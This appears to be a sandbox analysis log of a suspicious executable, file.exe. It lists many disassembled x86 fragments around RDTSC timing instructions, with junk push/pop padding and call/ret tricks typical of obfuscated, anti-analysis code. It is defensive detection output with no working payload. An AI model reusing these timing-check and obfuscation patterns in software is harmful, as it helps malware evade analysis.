Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E823E4 second address: E823F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c jng 00007F8854FD8856h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E823F8 second address: E82408 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jbe 00007F8854FAEB86h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E858D9 second address: E858DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E860A8 second address: E860D4 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8854FAEB86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c pushad 0x0000000d jne 00007F8854FAEB9Ah 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E86184 second address: E8619F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FD8867h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8619F second address: E861AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F8854FAEB86h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E86590 second address: E86594 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E86A53 second address: E86A5D instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8854FAEB8Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E87548 second address: E8754D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E873B5 second address: E873B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8754D second address: E87567 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8854FD885Dh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E873B9 second address: E873BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E87567 second address: E8756B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E873BF second address: E873C4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E88637 second address: E8863B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8B10D second address: E8B198 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB95h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c call 00007F8854FAEB97h 0x00000011 push ebx 0x00000012 js 00007F8854FAEB86h 0x00000018 pop edi 0x00000019 pop esi 0x0000001a push 00000000h 0x0000001c je 00007F8854FAEB8Ch 0x00000022 sbb edi, 6F23DD8Ch 0x00000028 jmp 00007F8854FAEB8Ch 0x0000002d push 00000000h 0x0000002f mov dword ptr [ebp+124795FCh], edx 0x00000035 xchg eax, ebx 0x00000036 jmp 00007F8854FAEB90h 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e jp 00007F8854FAEB99h 0x00000044 jmp 00007F8854FAEB93h 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8B198 second address: E8B1AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8854FD8863h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8988B second address: E89890 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8AEA2 second address: E8AEB0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FD885Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8A33F second address: E8A343 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E89890 second address: E89896 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8BA31 second address: E8BA43 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB8Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E89896 second address: E8989A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E3FD60 second address: E3FD79 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB90h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E3FD79 second address: E3FD7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E3FD7D second address: E3FD96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E3FD96 second address: E3FD9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E3FD9A second address: E3FD9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E3FD9E second address: E3FDA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8FDF1 second address: E8FDF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E90D6C second address: E90D70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E90D70 second address: E90D74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8FF11 second address: E8FFA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8854FD8869h 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e js 00007F8854FD8858h 0x00000014 push edi 0x00000015 pop edi 0x00000016 jmp 00007F8854FD8868h 0x0000001b popad 0x0000001c nop 0x0000001d push ecx 0x0000001e stc 0x0000001f pop edi 0x00000020 push dword ptr fs:[00000000h] 0x00000027 push 00000000h 0x00000029 push ecx 0x0000002a call 00007F8854FD8858h 0x0000002f pop ecx 0x00000030 mov dword ptr [esp+04h], ecx 0x00000034 add dword ptr [esp+04h], 0000001Ah 0x0000003c inc ecx 0x0000003d push ecx 0x0000003e ret 0x0000003f pop ecx 0x00000040 ret 0x00000041 mov bl, 7Fh 0x00000043 mov dword ptr fs:[00000000h], esp 0x0000004a mov dword ptr [ebp+12466F40h], ecx 0x00000050 mov eax, dword ptr [ebp+122D049Dh] 0x00000056 mov ebx, edi 0x00000058 push FFFFFFFFh 0x0000005a mov edi, edx 0x0000005c movzx ebx, bx 0x0000005f push eax 0x00000060 push eax 0x00000061 push edx 0x00000062 push eax 0x00000063 push edx 0x00000064 pushad 0x00000065 popad 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8FFA6 second address: E8FFAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E90FD2 second address: E90FE7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FD8861h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E92C65 second address: E92C75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 jo 00007F8854FAEB86h 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E97CCA second address: E97CD4 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8854FD8856h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E433AC second address: E433CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jng 00007F8854FAEB86h 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push edx 0x0000000e pop edx 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F8854FAEB8Fh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E9E4AC second address: E9E4B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E9B839 second address: E9B843 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E9F4F5 second address: E9F517 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F8854FD8858h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F8854FD8860h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E9F517 second address: E9F51B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E9F51B second address: E9F521 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E9F521 second address: E9F590 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F8854FAEB8Dh 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push eax 0x0000000f call 00007F8854FAEB88h 0x00000014 pop eax 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 add dword ptr [esp+04h], 00000016h 0x00000021 inc eax 0x00000022 push eax 0x00000023 ret 0x00000024 pop eax 0x00000025 ret 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push esi 0x0000002b call 00007F8854FAEB88h 0x00000030 pop esi 0x00000031 mov dword ptr [esp+04h], esi 0x00000035 add dword ptr [esp+04h], 00000017h 0x0000003d inc esi 0x0000003e push esi 0x0000003f ret 0x00000040 pop esi 0x00000041 ret 0x00000042 mov edi, dword ptr [ebp+122D2D0Dh] 0x00000048 push 00000000h 0x0000004a push esi 0x0000004b mov dword ptr [ebp+122D2AAFh], ecx 0x00000051 pop edi 0x00000052 xchg eax, esi 0x00000053 push eax 0x00000054 push edx 0x00000055 pushad 0x00000056 jng 00007F8854FAEB86h 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E9F590 second address: E9F595 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E9F595 second address: E9F5B4 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F8854FAEB88h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007F8854FAEB90h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E9F5B4 second address: E9F5BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EA0693 second address: EA069A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EA069A second address: EA06A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EA8785 second address: EA8789 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EA8789 second address: EA879E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b pop edx 0x0000000c pushad 0x0000000d ja 00007F8854FD8856h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EA879E second address: EA87A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EA7E24 second address: EA7E2A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EA8117 second address: EA8120 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EA8287 second address: EA828D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EAE9D7 second address: EAEA14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edi 0x00000006 push eax 0x00000007 pushad 0x00000008 ja 00007F8854FAEB92h 0x0000000e jmp 00007F8854FAEB8Ch 0x00000013 jnc 00007F8854FAEB99h 0x00000019 jmp 00007F8854FAEB93h 0x0000001e popad 0x0000001f mov eax, dword ptr [esp+04h] 0x00000023 push esi 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EAEA14 second address: EAEA18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EAEA18 second address: EAEA1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EAEA1C second address: EAEA40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov eax, dword ptr [eax] 0x00000009 jnc 00007F8854FD885Eh 0x0000000f jl 00007F8854FD8858h 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jnc 00007F8854FD8856h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB2AD1 second address: EB2AE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007F8854FAEB86h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB2AE0 second address: EB2AE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB2DBB second address: EB2DDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007F8854FAEB8Eh 0x0000000b jng 00007F8854FAEB86h 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F8854FAEB8Bh 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB2DDF second address: EB2DE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB2DE3 second address: EB2DE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB322D second address: EB3232 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB7A84 second address: EB7AA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F8854FAEB97h 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB691A second address: EB6961 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F8854FD8866h 0x00000008 pop edx 0x00000009 jmp 00007F8854FD8861h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 jmp 00007F8854FD8865h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E83A82 second address: E83A88 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E83A88 second address: E83A9A instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8854FD8858h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E83A9A second address: E83AF7 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8854FAEB86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b nop 0x0000000c mov ecx, dword ptr [ebp+122D1E5Ah] 0x00000012 jmp 00007F8854FAEB91h 0x00000017 lea eax, dword ptr [ebp+1248383Dh] 0x0000001d push 00000000h 0x0000001f push ecx 0x00000020 call 00007F8854FAEB88h 0x00000025 pop ecx 0x00000026 mov dword ptr [esp+04h], ecx 0x0000002a add dword ptr [esp+04h], 00000019h 0x00000032 inc ecx 0x00000033 push ecx 0x00000034 ret 0x00000035 pop ecx 0x00000036 ret 0x00000037 mov ecx, edi 0x00000039 nop 0x0000003a jns 00007F8854FAEB8Ah 0x00000040 push eax 0x00000041 push ecx 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E83AF7 second address: E83AFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E83C56 second address: E83C5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8402C second address: E8403B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jng 00007F8854FD885Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8403B second address: E84052 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 jg 00007F8854FAEB8Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E84052 second address: CD3BE3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov dword ptr [ebp+122D1D8Fh], esi 0x0000000e push dword ptr [ebp+122D0D25h] 0x00000014 adc edx, 581B92B8h 0x0000001a mov cx, 0880h 0x0000001e call dword ptr [ebp+122D1C98h] 0x00000024 pushad 0x00000025 clc 0x00000026 xor eax, eax 0x00000028 cld 0x00000029 mov edx, dword ptr [esp+28h] 0x0000002d mov dword ptr [ebp+122D1D62h], edi 0x00000033 mov dword ptr [ebp+122D2DD9h], eax 0x00000039 add dword ptr [ebp+122D1D62h], ebx 0x0000003f mov esi, 0000003Ch 0x00000044 cmc 0x00000045 add esi, dword ptr [esp+24h] 0x00000049 pushad 0x0000004a add dword ptr [ebp+122D1D62h], esi 0x00000050 mov dword ptr [ebp+122D1D62h], ecx 0x00000056 popad 0x00000057 lodsw 0x00000059 mov dword ptr [ebp+122D1D62h], ecx 0x0000005f add eax, dword ptr [esp+24h] 0x00000063 cmc 0x00000064 mov ebx, dword ptr [esp+24h] 0x00000068 pushad 0x00000069 mov edi, dword ptr [ebp+122D2C21h] 0x0000006f movsx ecx, ax 0x00000072 popad 0x00000073 jmp 00007F8854FD8864h 0x00000078 push eax 0x00000079 pushad 0x0000007a push eax 0x0000007b push edx 0x0000007c pushad 0x0000007d popad 0x0000007e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E841A5 second address: E841A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E841A9 second address: E841AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E841AD second address: E84213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jns 00007F8854FAEB86h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 jnp 00007F8854FAEB90h 0x00000018 mov eax, dword ptr [esp+04h] 0x0000001c jmp 00007F8854FAEB95h 0x00000021 mov eax, dword ptr [eax] 0x00000023 push edx 0x00000024 push edx 0x00000025 jnp 00007F8854FAEB86h 0x0000002b pop edx 0x0000002c pop edx 0x0000002d mov dword ptr [esp+04h], eax 0x00000031 push ebx 0x00000032 ja 00007F8854FAEB88h 0x00000038 pop ebx 0x00000039 pop eax 0x0000003a mov dword ptr [ebp+122D38B2h], edi 0x00000040 push 9676C7A0h 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E84213 second address: E84217 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E84313 second address: E84332 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F8854FAEB95h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E84332 second address: E84337 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E84F0E second address: E84F68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB8Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F8854FAEB8Dh 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push ebp 0x00000013 call 00007F8854FAEB88h 0x00000018 pop ebp 0x00000019 mov dword ptr [esp+04h], ebp 0x0000001d add dword ptr [esp+04h], 0000001Ah 0x00000025 inc ebp 0x00000026 push ebp 0x00000027 ret 0x00000028 pop ebp 0x00000029 ret 0x0000002a mov edi, dword ptr [ebp+122D1DBCh] 0x00000030 lea eax, dword ptr [ebp+12483881h] 0x00000036 cmc 0x00000037 nop 0x00000038 ja 00007F8854FAEB98h 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E84F68 second address: E84F6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E84F6C second address: E84F70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E84F70 second address: E84F93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007F8854FD8863h 0x0000000d ja 00007F8854FD885Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
